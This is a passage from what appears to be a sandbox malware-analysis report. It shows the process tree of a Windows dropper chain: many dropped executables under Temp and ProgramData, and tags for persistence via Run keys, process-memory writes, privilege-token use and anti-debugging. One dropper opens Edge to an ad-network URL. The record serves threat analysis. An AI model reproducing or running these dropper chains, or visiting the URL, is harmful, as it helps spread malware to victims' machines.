        6⤵
        
        PID:10748
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9812
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11168
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10112
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10848
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10896
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10764
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10988
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10800
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8592
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10424
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10396
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10520
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9724
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8384
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8668
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10000
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8656
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10952
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10952 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:10744
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10212
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8744
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10368
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10080
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10840
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10420
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11288
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11464
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11568
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11596
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11672
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11704
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11784
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11808
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11844
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11920
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:12040
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:12120
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:12208
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:10504
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11332
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11332 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:700
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11528
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:11628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4828
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:5080
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 280
        6⤵
        Drops file in Windows directory
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4992
      - C:\ProgramData\720985.exe
        
        "C:\ProgramData\720985.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5624 -s 2308
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6860
      - C:\ProgramData\410673.exe
        
        "C:\ProgramData\410673.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5720
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:5204
      - C:\ProgramData\1779428.exe
        
        "C:\ProgramData\1779428.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:724
      - C:\ProgramData\6312160.exe
        
        "C:\ProgramData\6312160.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
      - C:\ProgramData\2100396.exe
        
        "C:\ProgramData\2100396.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:736
      - C:\ProgramData\6661818.exe
        
        "C:\ProgramData\6661818.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5708
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 2368
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2400
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        
        PID:4868
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4868 -s 284
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:812
    - - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4584
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 1776
        6⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1364

C:\Users\Admin\AppData\Local\Temp\is-TNTG7.tmp\Tue11b9d76a96506.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TNTG7.tmp\Tue11b9d76a96506.tmp" /SL5="$4013E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11b9d76a96506.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5132
- C:\Users\Admin\AppData\Local\Temp\is-O7BF1.tmp\46807GHF____.exe
  "C:\Users\Admin\AppData\Local\Temp\is-O7BF1.tmp\46807GHF____.exe" /S /UID=burnerch2
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  PID:5508
- - C:\Users\Admin\AppData\Local\Temp\DHNPSCMOMB\ultramediaburner.exe
    "C:\Users\Admin\AppData\Local\Temp\DHNPSCMOMB\ultramediaburner.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    PID:5212
  - - C:\Users\Admin\AppData\Local\Temp\is-HO7RA.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-HO7RA.tmp\ultramediaburner.tmp" /SL5="$40242,281924,62464,C:\Users\Admin\AppData\Local\Temp\DHNPSCMOMB\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:568
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:5468
- - C:\Users\Admin\AppData\Local\Temp\50-6818b-4cc-c868e-ff418fb7d4927\Decekaebocy.exe
    "C:\Users\Admin\AppData\Local\Temp\50-6818b-4cc-c868e-ff418fb7d4927\Decekaebocy.exe"
    3⤵
    - Executes dropped EXE
    PID:508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Suspicious use of FindShellTrayWindow
      PID:5272
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7fffd17846f8,0x7fffd1784708,0x7fffd1784718
        5⤵
        Modifies data under HKEY_USERS
        
        PID:5424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        5⤵
        
        PID:4940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
        5⤵
        
        PID:1856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
        5⤵
        
        PID:3376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:1
        5⤵
        
        PID:5928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        5⤵
        
        PID:696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
        5⤵
        
        PID:5512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
        5⤵
        
        PID:1536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
        5⤵
        
        PID:4364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        
        PID:5744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        
        PID:6012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
        5⤵
        
        PID:5036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5924 /prefetch:8
        5⤵
        
        PID:5556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3376 /prefetch:2
        5⤵
        
        PID:5904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4200 /prefetch:8
        5⤵
        
        PID:6324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 /prefetch:8
        5⤵
        
        PID:6512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1
        5⤵
        
        PID:3792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
        5⤵
        
        PID:3152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:8
        5⤵
        
        PID:1884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
        5⤵
        
        PID:2448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2068 /prefetch:1
        5⤵
        
        PID:6192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
        5⤵
        
        PID:6684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5700 /prefetch:8
        5⤵
        
        PID:3088
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5408048994949311950,3326208851207314314,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
        5⤵
        
        PID:8164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
